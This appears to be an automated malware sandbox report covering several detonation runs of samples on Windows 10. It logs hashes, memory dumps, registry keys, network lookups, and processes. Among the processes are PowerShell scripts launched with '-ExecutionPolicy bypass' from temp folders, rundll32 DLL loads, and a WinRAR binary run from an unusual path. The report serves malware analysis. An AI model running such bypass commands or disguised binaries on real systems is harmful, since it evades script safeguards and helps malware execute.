| SHA256 | 1e328ea5223b16dec5b109c8b412e71d891e12d0de423b72f6b473d858c0b362 |
| SHA512 | 1b5b83412f8ea62e502129abb3664608fd4688286ff8fc5d7b0eab4cee0c5457793ddd5eebf29978cce20bac86e79351df6480336b6913bdc02a4ebc30e48dc4 |
memory/164-733-0x0000000000400000-0x0000000000450000-memory.dmp
memory/164-739-0x0000000005240000-0x00000000052D2000-memory.dmp
C:\Users\Admin\AppData\Roaming\services\WGET-H~1
| MD5 | 990d670f7d0d9addc18642f106831b36 |
| SHA1 | b3b3f72b362c153a8fa060b6e26c0972682e3582 |
| SHA256 | dbd84f95c50bcad3bdd257368e723deee49c428a4434c1a6ffb2852f12611253 |
| SHA512 | 25bde6d8817126077b27b11042b42424d23ca9168e127812c31f2f7aeda93e9e47c971fd0d4b9e36cbee405f3e4085ae14e362deae76148fe69d9c5bb0f7206a |
memory/196-752-0x0000000140000000-0x0000000140AB6000-memory.dmp
memory/196-753-0x0000000140000000-0x0000000140AB6000-memory.dmp
memory/196-756-0x0000000140000000-0x0000000140AB6000-memory.dmp
Analysis: behavioral7
Detonation Overview
Submitted
2024-02-23 10:15
Reported
2024-02-23 10:22
Platform
win10-20240214-en
Max time kernel
117s
Max time network
131s
Command Line
Signatures
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: 33 | N/A | C:\Windows\system32\AUDIODG.EXE | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\system32\AUDIODG.EXE | N/A |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\data\AppInfo\YwTGpGD7UtG1.ps1
C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x410
Network
| Country | Destination | Domain | Proto |
| US | 20.231.121.79:80 | tcp | |
| NL | 52.111.243.30:443 | tcp | |
| US | 8.8.8.8:53 | 200.201.50.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 210.178.17.96.in-addr.arpa | udp |
Files
memory/3244-4-0x00007FF8B9920000-0x00007FF8BA30C000-memory.dmp
memory/3244-6-0x0000024B42120000-0x0000024B42130000-memory.dmp
memory/3244-5-0x0000024B42120000-0x0000024B42130000-memory.dmp
memory/3244-7-0x0000024B42170000-0x0000024B42192000-memory.dmp
memory/3244-10-0x0000024B5A950000-0x0000024B5A9C6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_v1hzz0dj.dw2.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/3244-31-0x0000024B42120000-0x0000024B42130000-memory.dmp
memory/3244-37-0x00007FF8B9920000-0x00007FF8BA30C000-memory.dmp
Analysis: behavioral11
Detonation Overview
Submitted
2024-02-23 10:15
Reported
2024-02-23 10:23
Platform
win10-20240221-en
Max time kernel
116s
Max time network
149s
Command Line
Signatures
Modifies system executable filetype association
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shellex\PropertySheetHandlers\{B41DB860-8EE4-11D2-9906-E49FADC173CA} | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shellex\PropertySheetHandlers\{B41DB860-8EE4-11D2-9906-E49FADC173CA}\ | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\WinRAR32 | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\WinRAR32\ = "{B41DB860-8EE4-11D2-9906-E49FADC173CA}" | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shellex\PropertySheetHandlers\{B41DB860-64E4-11D2-9906-E49FADC173CA} | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shellex\PropertySheetHandlers\{B41DB860-64E4-11D2-9906-E49FADC173CA}\ | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\WinRAR | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\WinRAR\ = "{B41DB860-64E4-11D2-9906-E49FADC173CA}" | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.REV\shell\open | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\shellex\ContextMenuHandlers\{B41DB860-8EE4-11D2-9906-E49FADC173CA} | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\shellex\PropertySheetHandlers\{B41DB860-64E4-11D2-9906-E49FADC173CA}\ | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\DragDropHandlers\WinRAR | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.REV\shell\open\command | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shellex\PropertySheetHandlers\{B41DB860-8EE4-11D2-9906-E49FADC173CA}\ | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\shellex\PropertySheetHandlers\{B41DB860-64E4-11D2-9906-E49FADC173CA} | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Folder\shellex\ContextMenuHandlers\WinRAR | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shellex\PropertySheetHandlers\{B41DB860-8EE4-11D2-9906-E49FADC173CA} | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\WinRAR32 | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\shellex\ContextMenuHandlers\{B41DB860-64E4-11D2-9906-E49FADC173CA}\ | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.REV\DefaultIcon | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\WinRAR32\ = "{B41DB860-8EE4-11D2-9906-E49FADC173CA}" | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\DragDropHandlers\WinRAR32\ = "{B41DB860-8EE4-11D2-9906-E49FADC173CA}" | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\WinRAR | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\shellex\ContextMenuHandlers\{B41DB860-8EE4-11D2-9906-E49FADC173CA}\ | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\shellex\ContextMenuHandlers\{B41DB860-64E4-11D2-9906-E49FADC173CA} | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Folder\shellex\DragDropHandlers\WinRAR | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.rev | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\DefaultIcon | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\shellex\PropertySheetHandlers | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\shellex\PropertySheetHandlers\{B41DB860-8EE4-11D2-9906-E49FADC173CA} | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Folder\shellex\DragDropHandlers\WinRAR32\ = "{B41DB860-8EE4-11D2-9906-E49FADC173CA}" | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shellex\PropertySheetHandlers\{B41DB860-64E4-11D2-9906-E49FADC173CA}\ | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\shellex\ContextMenuHandlers\{B41DB860-8EE4-11D2-9906-E49FADC173CA} | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\shellex\PropertySheetHandlers\{B41DB860-8EE4-11D2-9906-E49FADC173CA}\ | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\shellex\PropertySheetHandlers\{B41DB860-64E4-11D2-9906-E49FADC173CA}\ | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\WinRAR\ = "{B41DB860-64E4-11D2-9906-E49FADC173CA}" | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\shellex\PropertySheetHandlers | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\shell | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\shell\open\command\ = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\data\\AppInfo\\services\\WinRAR.exe\" \"%1\"" | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Folder\shellex\DragDropHandlers\WinRAR\ = "{B41DB860-64E4-11D2-9906-E49FADC173CA}" | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\WinRAR | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\ = "WinRAR archive" | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\shell\open | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Folder\shellex\ContextMenuHandlers\WinRAR32 | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\shellex\ContextMenuHandlers\{B41DB860-64E4-11D2-9906-E49FADC173CA} | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\shellex\DropHandler\ = "{B41DB860-64E4-11D2-9906-E49FADC173CA}" | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.REV\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\data\\AppInfo\\services\\WinRAR.exe,1" | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.REV\shell | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\shellex\PropertySheetHandlers\{B41DB860-8EE4-11D2-9906-E49FADC173CA} | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\shellex\PropertySheetHandlers\{B41DB860-8EE4-11D2-9906-E49FADC173CA}\ | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\shellex\DropHandler\ = "{B41DB860-8EE4-11D2-9906-E49FADC173CA}" | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shellex\PropertySheetHandlers\{B41DB860-64E4-11D2-9906-E49FADC173CA} | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\DefaultIcon | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\data\\AppInfo\\services\\WinRAR.exe,0" | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\shellex | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\shellex\DropHandler | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Folder\shellex\DragDropHandlers\WinRAR32 | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Folder\shellex\ContextMenuHandlers\WinRAR\ = "{B41DB860-64E4-11D2-9906-E49FADC173CA}" | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\WinRAR\ = "{B41DB860-64E4-11D2-9906-E49FADC173CA}" | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\DragDropHandlers\WinRAR\ = "{B41DB860-64E4-11D2-9906-E49FADC173CA}" | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\data\\AppInfo\\services\\WinRAR.exe,0" | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.REV\ = "RAR recovery volume" | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\shellex\ContextMenuHandlers | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\shellex\DropHandler | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\DragDropHandlers\WinRAR32 | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\WinRAR32\ = "{B41DB860-8EE4-11D2-9906-E49FADC173CA}" | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\shell | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.rev\ = "WinRAR.REV" | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.REV\shell\open\command\ = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\data\\AppInfo\\services\\WinRAR.exe\" \"%1\"" | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe
"C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1720 -s 2952
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | notifier.rarlab.com | udp |
| DE | 51.195.68.172:80 | notifier.rarlab.com | tcp |
| DE | 51.195.68.172:443 | notifier.rarlab.com | tcp |
| US | 8.8.8.8:53 | 172.68.195.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 32.169.19.2.in-addr.arpa | udp |
| DE | 51.195.68.172:443 | notifier.rarlab.com | tcp |
| US | 8.8.8.8:53 | 193.179.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 129.134.221.88.in-addr.arpa | udp |
| IE | 52.111.236.23:443 | tcp | |
| US | 8.8.8.8:53 | 14.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 190.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 89.16.208.104.in-addr.arpa | udp |
Files
Analysis: behavioral17
Detonation Overview
Submitted
2024-02-23 10:15
Reported
2024-02-23 10:22
Platform
win10-20240221-en
Max time kernel
128s
Max time network
136s
Command Line
Signatures
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: 33 | N/A | C:\Windows\system32\AUDIODG.EXE | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\system32\AUDIODG.EXE | N/A |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\data\Data\QsVakRcJSHTg.ps1
C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x308
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 89.16.208.104.in-addr.arpa | udp |
Files
memory/3356-5-0x00007FFE62340000-0x00007FFE62D2C000-memory.dmp
memory/3356-4-0x0000014A38C10000-0x0000014A38C32000-memory.dmp
memory/3356-6-0x0000014A38A60000-0x0000014A38A70000-memory.dmp
memory/3356-7-0x0000014A38A60000-0x0000014A38A70000-memory.dmp
memory/3356-10-0x0000014A512E0000-0x0000014A51356000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_pnusit1r.t20.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/3356-31-0x0000014A38A60000-0x0000014A38A70000-memory.dmp
memory/3356-37-0x00007FFE62340000-0x00007FFE62D2C000-memory.dmp
Analysis: behavioral21
Detonation Overview
Submitted
2024-02-23 10:15
Reported
2024-02-23 10:22
Platform
win10-20240221-en
Max time kernel
128s
Max time network
136s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\data\Qt5Core.dll,#1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.8.0.8.0.8.0.8.0.ip6.arpa | udp |
| US | 8.8.8.8:53 | 96.134.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 63.141.182.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 180.178.17.96.in-addr.arpa | udp |
Files
Analysis: behavioral26
Detonation Overview
Submitted
2024-02-23 10:15
Reported
2024-02-23 10:22
Platform
win10-20240221-en
Max time kernel
113s
Max time network
140s
Command Line
Signatures
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\data\Tools\9syz0JDU8L0Z.ps1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 96.134.221.88.in-addr.arpa | udp |
Files
memory/4872-4-0x000002D670530000-0x000002D670552000-memory.dmp
memory/4872-5-0x00007FFF60DF0000-0x00007FFF617DC000-memory.dmp
memory/4872-6-0x000002D670AB0000-0x000002D670AC0000-memory.dmp
memory/4872-8-0x000002D670AB0000-0x000002D670AC0000-memory.dmp
memory/4872-10-0x000002D670BC0000-0x000002D670C36000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_pbfvhjcj.fgz.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/4872-33-0x000002D670AB0000-0x000002D670AC0000-memory.dmp
memory/4872-34-0x00007FFF60DF0000-0x00007FFF617DC000-memory.dmp
memory/4872-35-0x000002D670AB0000-0x000002D670AC0000-memory.dmp
memory/4872-36-0x000002D670AB0000-0x000002D670AC0000-memory.dmp
memory/4872-37-0x000002D670AB0000-0x000002D670AC0000-memory.dmp
Analysis: behavioral29
Detonation Overview
Submitted
2024-02-23 10:15
Reported
2024-02-23 10:23
Platform
win10-20240221-en
Max time kernel
114s
Max time network
136s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\data\UNRAR64.dll,#1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 96.134.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 24.73.42.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 189.178.17.96.in-addr.arpa | udp |
Files
Analysis: behavioral3
Detonation Overview
Submitted
2024-02-23 10:15
Reported
2024-02-23 10:23
Platform
win10-20240221-en
Max time kernel
118s
Max time network
136s
Command Line
Signatures
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\data\AppInfo\RIBTwoUATqEp.ps1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 129.134.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 121.150.79.40.in-addr.arpa | udp |
Files
memory/1364-4-0x000002AF3AAC0000-0x000002AF3AAE2000-memory.dmp
memory/1364-5-0x00007FFAABF20000-0x00007FFAAC90C000-memory.dmp
memory/1364-8-0x000002AF3AA30000-0x000002AF3AA40000-memory.dmp
memory/1364-9-0x000002AF3AA30000-0x000002AF3AA40000-memory.dmp
